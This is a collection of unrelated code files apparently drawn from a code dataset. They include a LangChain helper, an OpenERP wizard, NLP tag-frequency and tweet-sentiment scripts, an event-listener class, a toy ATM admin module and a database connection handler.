By default\n will be inferred from the function types. If pydantic.BaseModels are passed\n in, then the OutputParser will try to parse outputs using those. Otherwise\n model outputs will simply be parsed as JSON.\n\n Returns:\n An LLMChain that will pass the given function to the model.\n\n Example:\n .. code-block:: python\n\n from langchain.chains.openai_functions import create_structured_output_chain\n from langchain.chat_models import ChatOpenAI\n from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate\n\n from pydantic import BaseModel, Field\n\n class Dog(BaseModel):\n \\\"\\\"\\\"Identifying information about a dog.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The dog's name\")\n color: str = Field(..., description=\"The dog's color\")\n fav_food: Optional[str] = Field(None, description=\"The dog's favorite food\")\n\n llm = ChatOpenAI(model=\"gpt-3.5-turbo-0613\", temperature=0)\n prompt_msgs = [\n SystemMessage(\n content=\"You are a world class algorithm for extracting information in structured formats.\"\n ),\n HumanMessage(content=\"Use the given format to extract information from the following input:\"),\n HumanMessagePromptTemplate.from_template(\"{input}\"),\n HumanMessage(content=\"Tips: Make sure to answer in the correct format\"),\n ]\n prompt = ChatPromptTemplate(messages=prompt_msgs)\n chain = create_structured_output_chain(Dog, llm, prompt)\n chain.run(\"Harry was a chubby brown beagle who loved chicken\")\n # -> Dog(name=\"Harry\", color=\"brown\", fav_food=\"chicken\")\n \"\"\" # noqa: E501\n if isinstance(output_schema, dict):\n function: Any = {\n \"name\": \"output_formatter\",\n \"description\": (\n \"Output formatter. Should always be used to format your response to the\"\n \" user.\"\n ),\n \"parameters\": output_schema,\n }\n else:\n\n class _OutputFormatter(BaseModel):\n \"\"\"Output formatter. Should always be used to format your response to the user.\"\"\" # noqa: E501\n\n output: output_schema # type: ignore\n\n function = _OutputFormatter\n output_parser = output_parser or PydanticAttrOutputFunctionsParser(\n pydantic_schema=_OutputFormatter, attr_name=\"output\"\n )\n return create_openai_fn_chain(\n [function], llm, prompt, output_parser=output_parser, **kwargs\n )\n","sub_path":"langchain/chains/openai_functions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556153682","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2013 Elico Corp. All Rights Reserved.\n# Author: Yannick Gouin \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nfrom osv import osv, fields\nfrom tools.translate import _\n\nclass gap_analysis_wizard(osv.osv_memory):\n    _name='gap_analysis.gap_analysis_wizard'\n    \n    def print_xls(self, cr, uid, ids, context=None):\n        if context is None:\n            context = {}\n        \n        data = {'model':'gap_analysis', 'ids':context.get('active_ids', []), 'id':ids[0], 'report_type': 'aeroo'}\n        \n        return {\n            'type': 'ir.actions.report.xml',\n            'report_name': 'gap_analysis',\n            'datas': data,\n            'context':context\n        }\ngap_analysis_wizard()\n\n\nclass gap_analysis_tasks_list(osv.osv_memory):\n    _name='gap_analysis.tasks_list'\n    \n    def print_xls(self, cr, uid, ids, context=None):\n        if context is None:\n            context = {}\n        \n        data = {'model':'project.task', 'ids':context.get('active_ids', []), 'id': context.get('active_id', ids[0]), 'report_type': 'aeroo'}\n        \n        return {\n            'type': 'ir.actions.report.xml',\n            'report_name': 'tasks_list',\n            'datas': data,\n            'context':context\n        }\ngap_analysis_tasks_list()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"gap_analysis_aeroo_report/wizard/wizard_view.py","file_name":"wizard_view.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"635802474","text":"#\n# findTagFreq.py\n#\n\nimport pickle\nimport collections\n\n\ndef getPickle():\n\n    \"\"\"\n    # untaggedCorpusSents\n    # List of Lists...\n    # 275\n    # \n    # ['see', 'bob']\n    # ['see', 'bob', 'run']\n    # ['mary', 'saw', 'pookie', 'in', 'the', 'park', 'with', 'a', 'telescope']\n    # ...\n    # NOTE: May contain nonsensical or partial/incomplete sentances\n    # ['use', 'caution', 'inbetween']\n    # ['but', 'once', 'it', 'was', 'on']\n    # ['oh']\n    #\n    with open('pickles/untaggedCorpusSents.pkl', 'rb') as fp:\n        ourPickle = pickle.load(fp)\n        print('Aunt Bee loaded untaggedCorpusSents.pkl')\n        fp.close()\n    \"\"\"\n    \n    # taggedCorpusSents\n    # List of lists containing tuples...\n    # 275\n    # \n    # [('see', 'VB'), ('bob', 'NNP')]\n    # [('see', 'VB'), ('bob', 'NNP'), ('run', 'VB')]\n    # [('mary', 'NNP'), ('saw', 'VBD'), ('pookie', 'NNP'), ('in', 'IN'), ('the', 'DT'), ('park', 'NN'), ('with', 'IN'), ('a', 'DT'), ('telescope', 'NN')]\n    # ...\n    # NOTE: May contain nonsensical or partial/incomplete sentances\n    # [('use', 'VB'), ('caution', 'NN'), ('inbetween', 'JJ')]\n    # [('but', 'CC'), ('once', 'IN'), ('it', 'PRP'), ('was', 'VBD'), ('on', 'IN')]\n    # [('oh', 'UH')]\n    #\n    with open('pickles/taggedCorpusSents.pkl', 'rb') as fp:\n        ourPickle = pickle.load(fp)\n        print('Aunt Bee loaded taggedCorpusSents.pkl')\n        fp.close()\n    \n    \"\"\"\n    # taggedBoW\n    # List of tuples...\n    # 715\n    # \n    # ('my', 'PRP$')\n    # ('name', 'NN')\n    # ('is', 'VBZ')\n    # ('allie', 'NNP')\n    # ('kay', 'NNP')\n    # ('and', 'CC')\n    #\n    with open('pickles/taggedBoW.pkl', 'rb') as fp:\n        ourPickle = pickle.load(fp)\n        print('Aunt Bee loaded taggedBoW.pkl')\n        fp.close()\n    \"\"\"\n    \"\"\"\n    # Inflections:\n    # List of lists...\n    # 112505\n    # \n    # ['acadia', 'n', 'acadias', 'acadiae']\n    # ['acadian', 'n', 'acadians']\n    # ['acalepha', 'n', 'acalephae']\n    # ['acalypha', 'n', 'acalyphas', 'acalyphae']\n    # ...\n    # ['zoom', 'n', 'zooms']\n    # ['zoom', 'v', 'zoomed', 'zooming', 'zooms']\n    # ...\n    # ['zymosis', 'n', 'zymoses']\n    # ['zymotechnic', 'n', 'zymotechnics']\n    # ['zymotic', 'a', 'zymoticer', 'zymoticcer', 'zymoticest', 'zymoticcest']\n    # ['zymurgy', 'n', 'zymurgies']\n    # ['zyzzyva', 'n', 'zyzzyvas']\n    #\n    with 
open('pickles/inflections.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded inflections.pkl')\n fp.close()\n \"\"\"\n \"\"\"\n # kbDict\n # List of dictionaries...\n # 31\n # \n # {'name': 'instrument', 'ppt': 't', 'tag': 'NN', 'canDo': 'TBD', 'superclass': 'thing'}\n # {'name': 'recreation_ground', 'ppt': 'p', 'tag': 'NN', 'canDo': 'TBD', 'superclass': 'thing'}\n #{'name': 'animal', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'thing'}\n # ...\n #\n # {'name': 'man', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'human'}\n # {'name': 'cat', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'feline'}\n # {'name': 'dog', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run', 'superclass': 'canine'}\n # {'name': 'park', 'ppt': 'p', 'tag': 'NN', 'canDo': 'recreation', 'superclass': 'recreation_ground'}\n # {'name': 'playground', 'ppt': 't', 'tag': 'NN', 'canDo': 'play', 'superclass': 'park'}\n # {'name': 'duck', 'ppt': 't', 'tag': 'NN', 'canDo': 'see,eat,walk,run,fly', 'superclass': 'bird'}\n # ...\n #{'name': 'sam', 'ppt': 'P', 'tag': 'NNP', 'canDo': 'see,eat,walk,run', 'superclass': 'man'}\n #{'name': 'pookie', 'ppt': 't', 'tag': 'NNP', 'canDo': 'see,eat,walk,run', 'superclass': 'cat'}\n #{'name': 'daffy', 'ppt': 't', 'tag': 'NNP', 'canDo': 'see,eat,walk,run,fly', 'superclass': 'duck'}\n #\n with open('pickles/kbDict.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded kbDict.pkl')\n fp.close()\n \"\"\"\n \"\"\"\n # N_arry_Tree\n #\n with open('pickles/kbTree.pkl', 'rb') as fp:\n ourPickle = pickle.load(fp)\n print('Aunt Bee loaded kbTree.pkl')\n fp.close()\n \"\"\"\n \n return ourPickle\n \n\ndef savePickle(p):\n\n with open('pickles/newTaggedList.pkl', 'wb') as fp:\n pickle.dump(p, fp)\n print('Aunt Bee made a newTaggedList pickle')\n fp.close()\n\n\n\nif __name__ == \"__main__\":\n\n print('--- start findTagFrreq ---')\n\n tagFreqArr = []\n \n ourPickle = getPickle()\n\n print('ourPickle:')\n print(len(ourPickle))\n print(type(ourPickle))\n \n # Extract tags\n tags = []\n for s in ourPickle:\n tmp = []\n for w in s:\n tmp.append(w[1])\n tags.append(tmp)\n\n print('tags:')\n print(len(tags))\n print(type(tags))\n\n tagDash = []\n for t in tags:\n tmp = '-'.join(t)\n tagDash.append(tmp)\n\n print('tagDash:')\n print(len(tagDash))\n print(type(tagDash))\n \n\n tstLst = ['nnp', 'nn', 'nnp', 'vb', 'vbp', 'vb', 'nnp', 'vb', 'md', 'in', 'wdt', 'vb']\n \n counter = collections.Counter(tagDash)\n \n \n print('counter:')\n print(len(counter))\n print(type(counter))\n\n for k, v in counter.items():\n print('v: {}, k: {}'.format(v, k))\n\n","sub_path":"s10a/findTagFreq.py","file_name":"findTagFreq.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"447544249","text":"class Event:\n\n\tdef __init__( self, eventName, sender, *args, **kargs ):\n\t\tself.name = eventName\n\t\tself.sender = sender\n\t\tself.args = args\n\t\tself.kargs = kargs\n\t#end\n\t\n#end class Event\n\nclass EventsListener:\n\n\tBLOCKED_EVENTS \t= []\n\tCOMMON_EVENTS \t= []\n\tBLOCK_EVENTS \t= False\t\n\t\n\tdef __init__( self ):\n\t\tself.connected_events = []\n\t\tself.connected_objects = []\n\t#end\n\t\n\t@staticmethod\n\tdef BLOCKEVENTS( eventName = None ):\n\t\tif not eventName : EventsListener.BLOCK_EVENTS = True\n\t\telse : EventsListener.BLOCKED_EVENTS.append( eventName )\n\t#end\n\t\n\t@staticmethod\n\tdef UNBLOCKEVENTS( 
eventName = None ):\n\t\tif not eventName : EventsListener.BLOCK_EVENTS = False\n\t\telse : EventsListener.BLOCKED_EVENTS.remove( eventName )\n\t#end\n\n\t@staticmethod\n\tdef EVENT( eventName, *args, **kargs ):\n\t\tif EventsListener.BLOCK_EVENTS : return\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return\n\n\t\twevent = Event( eventName, None, *args, **kargs )\n\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\tif eventName == event[ 0 ] : \n\t\t\t\tres = event[ 1 ]( wevent )\n\t\t\t\tif res : return res\n\t#end\n\t\n\tdef disconnectEventsInConnectedObjects( self, eventName, connectedFunc ):\n\t\tfor obj in self.connected_objects :\n\t\t\tif [ eventName, connectedFunc ] in obj.connected_events : \n\t\t\t\tself.disconnect( eventName, connectedFunc, obj )\n\t#end\n\t\n\tdef connect( self, eventName, connectedFunc, objectToConnect = None ):\n\t\tif objectToConnect :\n\t\t\tif not [ eventName, connectedFunc] in objectToConnect.connected_events:\n\t\t\t\tobjectToConnect.connected_events.append( [ eventName, connectedFunc ] )\n\t\t\tif not objectToConnect in self.connected_objects : self.connected_objects.append( objectToConnect )\n\t\telse: EventsListener.COMMON_EVENTS.append( [ eventName, connectedFunc ] )\n\t#end\n\t\n\tdef disconnect( self, eventName, connectedFunc, objectToConnect = None ):\n\t\tif objectToConnect : \n\t\t\tif [ eventName, connectedFunc ] in objectToConnect.connected_events : \n\t\t\t\tobjectToConnect.connected_events.remove( [ eventName, connectedFunc ] )\n\t\telse: \n\t\t\tself.disconnectEventsInConnectedObjects( eventName, connectedFunc )\n\t\t\tif [ eventName, connectedFunc ] in EventsListener.COMMON_EVENTS : \n\t\t\t\tEventsListener.COMMON_EVENTS.remove( [ eventName, connectedFunc ] )\n\t#end\n\t\n\tdef event( self, eventName, *args, **kargs ):\n\t\tif EventsListener.BLOCK_EVENTS : return\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return\n\t\t\n\t\twevent = Event( eventName, self, *args, **kargs )\n\t\t\n\t\tif hasattr( self, eventName ) : getattr( self, eventName )( wevent )\n\t\t\n\t\tcommon_event = True\n\t\tfor event in self.connected_events:\n\t\t\tif eventName == event[ 0 ] : \n\t\t\t\tcommon_event = False\n\t\t\t\tevent[ 1 ]( wevent )\n\n\t\tif common_event :\n\t\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\t\tif eventName == event[ 0 ] : event[ 1 ]( wevent )\n\n\t#end\n\n\tdef eventResult( self, eventName, *args, **kargs ):\n\t\tresult = None\n\t\tif EventsListener.BLOCK_EVENTS : return result\n\t\tif eventName in EventsListener.BLOCKED_EVENTS : return result\n\t\t\n\t\twevent = Event( eventName, self, *args, **kargs )\n\t\t\n\t\tif hasattr( self, eventName ) : return getattr( self, eventName )( wevent )\n\t\t\n\t\tfor event in self.connected_events:\n\t\t\tif eventName == event[ 0 ] : return event[ 1 ]( wevent )\n\n\t\tfor event in EventsListener.COMMON_EVENTS:\n\t\t\tif eventName == event[ 0 ] : return event[ 1 ]( wevent )\n\n\t#end\n\n\t\n#end class EventsListener","sub_path":"res/scripts/client/System/Events.py","file_name":"Events.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634270810","text":"#管理员\r\nfrom time import sleep\r\n\r\nclass Admin(object):\r\n adminUserName = \"admin\"\r\n adminPassed = \"admin\"\r\n adminConfirmID = \"1234abcd\"\r\n\r\n def __init__(self, allUsers):\r\n self.allUsers = allUsers\r\n\r\n #开机\r\n def boot(self, times = 2):\r\n inputData = input(\"输入“boot”开机:\")\r\n while times > 0:\r\n\r\n if 
inputData == \"boot\":\r\n print(\"开机成功……\")\r\n return True\r\n else:\r\n print(\"输入有误!!您还有 %d 次机会,请重新输入……\" %(times))\r\n times -= 1\r\n inputData = input(\"输入“boot”开机:\")\r\n print(\"次数用尽!!开机失败……\")\r\n return False\r\n\r\n #管理员登录验证\r\n def adminLogin(self):\r\n inputAdminUserName = input(\"请输入管理员账户:\")\r\n if inputAdminUserName != self.adminUserName:\r\n input(\"管理员账户有误,登陆失败!!按任意键继续……\")\r\n return False\r\n inputAdminPassed = input(\"请输入管理员密码:\")\r\n if inputAdminPassed != self.adminPassed:\r\n input(\"管理员密码有误,登陆失败!!按任意键继续……\")\r\n return False\r\n print(\"登陆成功!!请稍等……\")\r\n sleep(1)\r\n print(\"-----------------------管理员须知-----------------------\")\r\n print(\"您好,这里是管理员须知。\\n\"\r\n \"作为管理员,请确认您是合法途径进入该系统且所有操作均合法。\\n\"\r\n \"您需做到以下几点:\\n\"\r\n \" • 1、不随意复制用户信息。\\n\"\r\n \" • 2、不随意传播用户信息。\\n\"\r\n \" • 3、不随意修改用户信息。\\n\"\r\n \" • 4、不随意删除用户信息。\\n\"\r\n \" • 5、不得随意删库!!!\")\r\n print(\"--------------------------------------------------------\")\r\n input(\"请谨慎操作!!按任意键继续……\")\r\n return True\r\n\r\n #更多(管理员操作)\r\n def more(self):\r\n if not self.adminLogin():\r\n return -1\r\n self.printAdminView()\r\n choice = input(\"请选择:\")\r\n if choice == \"all\":\r\n self.showAllUsersInfor()\r\n elif choice == \"delAll\":\r\n self.delAllUsers()\r\n else:\r\n print(\"输入有误!!正在返回首页……\")\r\n\r\n #查询用户信息\r\n def searchUserInfor(self):\r\n inputUserName = input(\"请输入用户姓名:\")\r\n print(\"-----------------------查询结果-----------------------\\n\")\r\n for i in self.allUsers:\r\n if inputUserName != self.allUsers[i].name:\r\n print(\"查无此人!!操作失败……\\n\")\r\n return -1\r\n print(\"姓名:%s 卡号:%s 身份证号:%s 电话:%s\" % (self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].idCard, self.allUsers[i].phoneNum))\r\n print(\"\\n------------------------------------------------------\\n\")\r\n\r\n #展示所有用户\r\n def showAllUsersInfor(self):\r\n print(\"---------------------用户信息---------------------\")\r\n print(\" 用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n for i in self.allUsers:\r\n print(\"姓名:%s 卡号:%s 余额:%d\" % (\r\n self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].card.cardMoney))\r\n print(\"电话号码:%s 身份证号:%s\\n\" % (self.allUsers[i].phoneNum, self.allUsers[i].idCard))\r\n print(\"--------------------------------------------------\\n\")\r\n\r\n #删除单个用户\r\n def delOneUser(self):\r\n inputAdminConfirmID = input(\"请输入管理员验证码:\")\r\n if inputAdminConfirmID != self.adminConfirmID:\r\n print(\"验证码错误!!删除失败……\")\r\n return -1\r\n print(\"-------------------危险操作!!-------------------\")\r\n print(\" 用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n for i in self.allUsers:\r\n print(\"姓名:%s 卡号:%s 余额:%d\" % (\r\n self.allUsers[i].name, self.allUsers[i].card.cardID, self.allUsers[i].card.cardMoney))\r\n print(\"--------------------------------------------------\\n\")\r\n inputDelUserCardID = input(\"请输入要删除账户卡号:\")\r\n if inputDelUserCardID not in self.allUsers:\r\n print(\"无此卡号,操作失败……\")\r\n return -1\r\n if not self.confirmOperation():\r\n print(\"------------------取消成功!!------------------\")\r\n return -1\r\n del(self.allUsers[i])\r\n print(\"删除成功!!正在返回……\")\r\n\r\n #删除所有用户\r\n def delAllUsers(self):\r\n inputAdminConfirmID = input(\"请输入管理员验证码:\")\r\n if inputAdminConfirmID != self.adminConfirmID:\r\n print(\"验证码错误!!删除失败……\")\r\n return -1\r\n print(\"-------------------危险操作!!-------------------\")\r\n print(\" 目前用户数:%d 总金额:%d\\n\" % (len(self.allUsers), self.dataStatistics()))\r\n if not self.confirmOperation():\r\n 
print(\"------------------取消成功!!------------------\")\r\n return -1\r\n if not self.confirmOperation():\r\n print(\"------------------取消成功!!------------------\")\r\n return -1\r\n self.allUsers = {}\r\n print(\"努力删库中……\")\r\n sleep(2)\r\n print(\"------------------删库成功!!------------------\")\r\n print(\"正在返回首页面……\")\r\n sleep(1)\r\n\r\n #数据统计\r\n def dataStatistics(self):\r\n sumMoney = 0\r\n userAmount = len(self.allUsers)\r\n for i in self.allUsers:\r\n sumMoney += self.allUsers[i].card.cardMoney\r\n return sumMoney\r\n\r\n #\r\n\r\n #操作确认\r\n def confirmOperation(self):\r\n choice = input(\"确认执行此操作?(yes / no): \")\r\n if choice == \"yes\":\r\n return True\r\n elif choice == \"no\":\r\n return False\r\n else:\r\n print(\"输入有误!!操作结束……\")\r\n return False\r\n\r\n\r\n\r\n","sub_path":"自主ATM机系统/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"573683459","text":"from . import BaseHandler\nfrom tools.DBHandler import PostgresConnection\n\n\nclass ConnectionHander(BaseHandler):\n\n def process(self):\n \"\"\"创建事务连接\"\"\"\n pool_key = self.get_query_argument('pool_key', '')\n key = self.get_query_argument('key', '')\n if not key:\n raise Exception(\"创建连接时,参数 key 不能为空!\")\n if key in self.conn and self.conn[key]:\n raise Exception(f\"该连接已存在,key: {key}\")\n if not pool_key:\n raise Exception(\"创建连接时,参数 pool_key 不能为空!\")\n if pool_key not in self.pool:\n raise Exception(f\"数据库 key 不存在,key: {key}\")\n self.conn[key] = PostgresConnection(pool_key, key, self.pool[pool_key].get_conn(key))\n return {\n \"key\": key\n }\n","sub_path":"DbCacheServer/api/ConnectionHandler.py","file_name":"ConnectionHandler.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"205025364","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport scipy\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport re\n\n\n# In[2]:\n\ntrain_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/train-tweets.txt\"\ntrain_twitter_sem_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/train-labels.txt\"\ndev_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/dev-tweets.txt\"\ndev_twitter_sem_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/dev-labels.txt\"\ntest_twitter_path = \"/Users/hannnnn/Desktop/knowledge_technologies/Assignment2/2017S1-KTproj2-data/test-tweets.txt\"\n\n\n# In[3]:\n\ntrain_twitter = open(train_twitter_path,encoding=\"utf-8\")\ntrain_twitter_sem = open(train_twitter_sem_path,encoding=\"utf-8\")\ndev_twitter = open(dev_twitter_path,encoding=\"utf-8\")\ndev_twitter_sem = open(dev_twitter_sem_path,encoding=\"utf-8\")\ntest_twitter = open(test_twitter_path,encoding=\"utf-8\")\nsem_result = open('/Users/hannnnn/Desktop/test-labels.txt', 'w')\ntry:\n all_train_twitter = train_twitter.readlines()\n all_train_twitter_sem = train_twitter_sem.readlines()\n all_dev_twitter = dev_twitter.readlines()\n all_dev_twitter_sem = dev_twitter_sem.readlines()\n all_test_twitter = test_twitter.readlines()\nfinally: \n train_twitter.close()\n train_twitter_sem.close()\n 
dev_twitter.close()\n    dev_twitter_sem.close()\n    test_twitter.close()\n# print(len(all_train_twitter))\n# print(len(all_train_twitter_sem))\n# print(len(all_dev_twitter))\n# print(len(all_dev_twitter_sem))\n# print(len(all_test_twitter))\n\n\n\n# In[4]:\n\npattern = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\(\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\nstart_num = 0\n_all_train_twitter = []\n_all_dev_twitter = []\n_all_test_twitter = []\nfor sentence in all_train_twitter:\n    _all_train_twitter.append(pattern.sub(\"\",sentence))\nfor sentence in all_dev_twitter:\n    _all_dev_twitter.append(pattern.sub(\"\",sentence))\nfor sentence in all_test_twitter:\n    _all_test_twitter.append(pattern.sub(\"\",sentence))\n\n# print(len(_all_train_twitter))\n# print(len(all_train_twitter_sem))\n# print(len(_all_dev_twitter))\n# print(len(all_dev_twitter_sem))\n\n\n\n# In[5]:\n\ntrain_words = []\ntrain_sem = []\ndev_words = []\ndev_sem = []\ntest_words = []\nstart_num = 0\nfor each_word in _all_train_twitter:\n    if start_num < len(_all_train_twitter):\n        temp = _all_train_twitter[start_num].split(\"\\t\")\n        temp[1] = temp[1][:-1]\n        train_words.append(temp[:2])\n        start_num = start_num + 1\n# print(len(train_words))\n# print(train_words)\n\nstart_num = 0\nfor each_word in all_train_twitter_sem:\n    if start_num < len(all_train_twitter_sem):\n        temp = all_train_twitter_sem[start_num].split(\"\\t\")\n        temp[1] = temp[1][:-1]\n        train_sem.append(temp[:2])\n        start_num = start_num + 1\n# print(len(train_sem))\n# print(train_sem)\n\nstart_num = 0\nfor each_word in _all_dev_twitter:\n    if start_num < len(_all_dev_twitter):\n        temp = _all_dev_twitter[start_num].split(\"\\t\")\n        temp[1] = temp[1][:-1]\n        dev_words.append(temp[:2])\n        start_num = start_num + 1\n# print(len(dev_words))\n# print(dev_words)\n\nstart_num = 0\nfor each_word in all_dev_twitter_sem:\n    if start_num < len(all_dev_twitter_sem):\n        temp = all_dev_twitter_sem[start_num].split(\"\\t\")\n        temp[1] = temp[1][:-1]\n        dev_sem.append(temp[:2])\n        start_num = start_num + 1\n# print(len(dev_sem))\n# print(dev_sem)\n\nstart_num = 0\nfor each_word in _all_test_twitter:\n    if start_num < len(_all_test_twitter):\n        temp = _all_test_twitter[start_num].split(\"\\t\")\n        temp[1] = temp[1][:-1]\n        test_words.append(temp[:2])\n        start_num = start_num + 1\n# print(len(test_words))\n# print(test_words)\n\n\n# In[6]:\n\ntrain_feature_sents = []\ntrain_sem_sents = []\ndev_feature_sents = []\ndev_sem_sents = []\ntest_feature_sents = []\nfor sents in train_words:\n    train_feature_sents.append(sents[1])\n\n# print(train_feature_sents)\n# print(len(train_feature_sents))\n    \nfor sents in train_sem:\n    if sents[1] == \"negative\":\n        train_sem_sents.append(\"-1\")\n    if sents[1] == \"positive\":\n        train_sem_sents.append(\"1\")\n    if sents[1] == \"neutral\":\n        train_sem_sents.append(\"0\")\n\n# print(train_sem_sents)\n# print(len(train_sem_sents))\n\nfor sents in dev_words:\n    dev_feature_sents.append(sents[1])\n    \n# print(dev_feature_sents)\n# print(len(dev_feature_sents))\n\nfor sents in dev_sem:\n    if sents[1] == \"negative\":\n        dev_sem_sents.append(\"-1\")\n    if sents[1] == \"positive\":\n        dev_sem_sents.append(\"1\")\n    if sents[1] == \"neutral\":\n        dev_sem_sents.append(\"0\")\n    \n# print(dev_sem_sents)\n# print(len(dev_sem_sents))\n\nfor sents in test_words:\n    test_feature_sents.append(sents[1])\n\n# print(test_feature_sents)\n# print(len(test_feature_sents))
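\n\n# NOTE (added sketch, not from the assignment): the three-way label mapping above\n# could be table-driven, reusing the variables already defined, e.g.\n#     SENT2ID = {\"negative\": \"-1\", \"neutral\": \"0\", \"positive\": \"1\"}\n#     train_sem_sents = [SENT2ID[s[1]] for s in train_sem]\n# SENT2ID is a hypothetical name introduced only for this note.\n\n\n# In[7]:\n\ndef tokenize_words(text):\n    from nltk.tokenize import sent_tokenize\n    from nltk.tokenize import word_tokenize\n\n    from 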
nltk.stem.lancaster import LancasterStemmer \n lancaster_stemmer = LancasterStemmer() \n\n sent_tokenize_list = sent_tokenize(text)\n word_tokenize_list = []\n for sents in sent_tokenize_list:\n word_tokenize_list = word_tokenize_list + word_tokenize(sents)\n\n \n pattern1 = re.compile(r\"[\\W]+\")\n pattern2 = re.compile(r\"\\d\")\n pattern3 = re.compile(r\"^[a-z]+$\")\n word_list = []\n\n for word in word_tokenize_list:\n word1 = pattern1.sub(\"\",word)\n word2 = pattern2.sub(\"\",word)\n word3 = pattern3.match(word)\n if word1 != \"\":\n if word2 != \"\":\n if word3 != None:\n if len(word) > 3:\n word_list.append(lancaster_stemmer.stem(word))\n return word_list\n\n\n# In[8]:\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nvec=TfidfVectorizer(max_df=0.99,min_df=10,stop_words='english',max_features=5000,analyzer = 'word',tokenizer = tokenize_words)\ntrain_matrix=vec.fit_transform(train_feature_sents).toarray()\ndev_matrix=vec.transform(dev_feature_sents)\ntest_matrix=vec.transform(test_feature_sents)\n\n\n# In[9]:\n\ndef calculate_result(actual,pred):\n print(metrics.classification_report(actual, pred))\n print(metrics.confusion_matrix(actual,pred,labels=[\"-1\",\"0\",\"1\"]))\n\n\n# In[10]:\n\n#Multinomial Naive Bayes Classifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn import metrics\nclf = MultinomialNB(alpha = 0.01)\nclf.fit(train_matrix,train_sem_sents)\npred = clf.predict(dev_matrix)\ncalculate_result(dev_sem_sents,pred)\n\n\n# In[11]:\n\n#Decision Tree Classifier\nfrom sklearn import tree\nclf = tree.DecisionTreeClassifier()\nclf.fit(train_matrix,train_sem_sents)\npred = clf.predict(dev_matrix)\ncalculate_result(dev_sem_sents,pred)\n\n\n# In[12]:\n\n#writing the prediction result to file\n#pred_sem_list = []\n#i = 0\n#for word in pred:\n# if word == '1':\n# pred_sem_list.append(\"positive\")\n# i = i+1\n# if word == '0':\n# pred_sem_list.append(\"neutral\")\n# i = i+1\n# if word == '-1':\n# pred_sem_list.append(\"negative\")\n# i = i+1\n#pred_list = []\n#num = 0\n#temp = []\n#for word in all_test_twitter:\n# if num < len(all_test_twitter):\n# temp = word.split(\"\\t\")\n# temp_word = temp[0] +\"\\t\"+ pred_sem_list[num]\n# pred_list.append(temp_word)\n# num = num +1\n#\n#for word in pred_list:\n# sem_result.write(word+\"\\n\")\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"assignment2/assignment-code/KTPro_Assig2.py","file_name":"KTPro_Assig2.py","file_ext":"py","file_size_in_byte":7634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160489122","text":"a = input()\n\nif a[len(a) - 1] == \" \":\n a = a[:len(a) - 1]\n\nb = []\n\ncon = 0\nwhile True:\n if con == len(a) - 1:\n if a[con] not in b:\n b.append(a[con])\n break\n if a[con] not in b:\n b.append(a[con])\n con += 2\n\nst = \"\"\nfor i in range(len(b)):\n st += b[i] + \",\"\n\nprint(st[:len(st) - 